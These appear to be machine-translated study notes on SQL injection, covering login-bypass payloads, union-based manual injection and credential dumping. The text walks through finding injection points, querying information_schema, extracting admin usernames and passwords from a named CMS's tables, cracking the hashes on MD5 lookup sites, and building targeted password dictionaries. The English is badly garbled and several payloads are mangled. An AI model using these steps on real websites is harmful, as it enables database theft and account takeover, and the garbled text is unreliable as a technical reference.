sql injection
1, the universal password, write your own website, find the login window, you must interact with the database, the malicious code inside the insertion configuration, you can log directly into the final, does not need an account and password, enter malicious code become universal password, end splicing sql statement, SELECT * FROM `users` wHERE user = '$ user' AND password = '$ pass';
local user does not deal with, you can enter a user name admin 'or 1 = 1 #, use' single quotes closing
comment symbol: # -% 25% 2d% 2d - +
enter: ADMIN 'AND1. 1 = #
ADMIN' limit. 1 = 0,1. 1 or #
single quotation marks need to end data type, if the string is We need to add type, do not need integral
configuration statement select * from 'users' where user = '$ user' or '1' = '1' and password = '$ pass';
Reasons occurred master password
parameters may be controlled at the front end of transfer, data back-end, back-end code execution process will also be used as a user input code does, contrary to the principle of separation of code and data
train of thought is that since the rear end of the front end of the transfer data is not filtered and not filtered or strict, leading to universal password sql injection
Harm, cause data leakage, dragged library, tampering with the site, destroying database, backdoor getshell
sql injection classification
request mode, get post cookie
parameter form, integer, character, search for
the type of feedback, error, union, delay, Boolean (time, page display status)
database type, access, mssql, mysql, oracle , nosql etc.
the use of technology, boolean, error, introverted, stacking time, the United
Manual injection
common database functions and constants
ASCII ()
User ()
Version ()
Database ()
the concat ()
GROUP_CONCAT ()
CONCAT_WS ()
substr (S, Start, Leng), string interception function has three parameters, the interception of the string, start index position, intercept length
substring (s, start, leng) mysql, mssql common
mid () mysql conventional
left (s, n), taken from the left starts, s intercepts string, n being the length taken to
right (s , n-), taken from the right start, s string is taken, n being the length to be taken
if (condition, the return value is true, not true return) function takes three parameters, the first condition is a first two conditions is true or the statement return value, the third condition is not true value or a return statement, for example, IF (=. 1. 1, "to true", "to false")
the CASE function representing the start, the eND indicates the end of the function . If condition1 establishment Returns result1, if condition2 true, then return result2, when all is not true result is returned, and when there is a set up, the latter is not executed.
lenght () string length is calculated
@@tmpdir
@@datader
@@basedir
@@version
@@hostname
The joint inquiry, can be used to collect information
selece * from users where id = 1 union select 1,2,3
query is no statement in front of the value, the value will be displayed after the statement of the joint inquiry
mysql database, a library a Schedule III field
mysql greater than 5.0, information_schema libraries, system libraries summary, library name other databases, table names, field names
columns table, storage database watches name field name
field under the attention columns table
table_schema, other database library name
table_name, table name other databases
column_name, field names other databases
Manual injection
1 detects the injection point (there may be local sql injection), find similar id (id / uid / typeid / sid / key) parameters, followed need to insert some detecting malicious code
'single quotation marks
"double quotes
' and 1 1-- =
0 'or'. 1 '='. 1
or need quotation marks, is determined by the sql statement spliced back, malicious pyload input is successfully performed (based on the page and to determine the error message), there is described herein sql injection point,
the next injection method needs to determine, given, Boolean, stacking and the like, according to the main echo results page, which is determined using the injection method, such as sleep () based on the time, determines the number of columns selected from the background database and which columns display
After 2, back-end database to collect information, like union is determined using the injection position results returned, will be displayed to the position where the front end of the column is modified to first look at the information, such as database (), user (), colume
3, obtaining the current name of the database table, such as, SELECT DISTINCT GROUP_CONCAT (DISTINCT table_name) FROM information_schema.COLUMNS where table_schema = 'jdycms'
4, obtain the specified field name in the current table in the database, such as SELECT DISTINCT GROUP_CONCAT (DISTINCT column_name) FROM information_schema.COLUMNS where table_schema = database () and table_name = 'jdy_admin'
5, to obtain the value, select concat (username, 0x7e, password) from jdy_admin
6, decryption, pmd5, cmd5, chamd5, somd5
7, looking for background login, guess directory, information collection, directory scan
cms content management system
cms noun, version, vulnerabilities, exploits
Social workers dictionary password generation tool
pydictor, powerful password generator
cupper, for people's social worker password generator
wordhound, Twitter-based search, pdf documents, reddit subsite create a password dictionary
brutescrape, read the site page content, page analysis, the analysis results export password dictionary
is easy excellent password generator
generated online